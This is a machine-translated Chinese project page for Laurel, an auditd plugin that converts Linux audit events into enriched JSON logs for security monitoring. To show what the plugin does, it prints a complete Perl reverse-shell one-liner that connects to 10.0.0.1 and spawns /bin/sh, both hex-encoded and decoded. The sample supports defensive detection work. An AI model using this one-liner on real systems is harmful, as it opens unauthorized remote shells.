laurel
v0.6.4
Laurel是Auditd(8)的事件後處理插件,可生成適用於現代安全監視設置的有用的,富含JSON的審核日誌。
與最新穩定版本相對應的文檔可以在此處找到。
TLDR:而不是看起來像這樣的審計事件…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…月桂樹將它們變成了JSON日誌,攻擊者/穿透者測試人員/紅色團隊者試圖製造的混亂變得乍一看很明顯:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
這發生在來源上,因為月桂樹在生成審計事件的主機上運行。事件豐富了有關父過程(PPID)的有用信息:
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
配置和操作細節在月桂樹(8)手冊頁中描述。有關日誌格式和理由的詳細信息,請參見laurel-about(7)手冊頁。月桂樹審計規則(7)頁麵包含建議和示例,以配置可用於檢測攻擊者戰術的審計規則。
月桂樹安裝指令包含有關如何從源構建LARUEL以及如何安裝和配置的說明。
我們開發了月桂樹,因為我們不滿足現有項目和產品的功能集和性能特徵。有關詳細信息,請參考性能文檔。
GNU通用公共許可證,版本3
徽標由Birgit Meyer <[email protected]>創建。
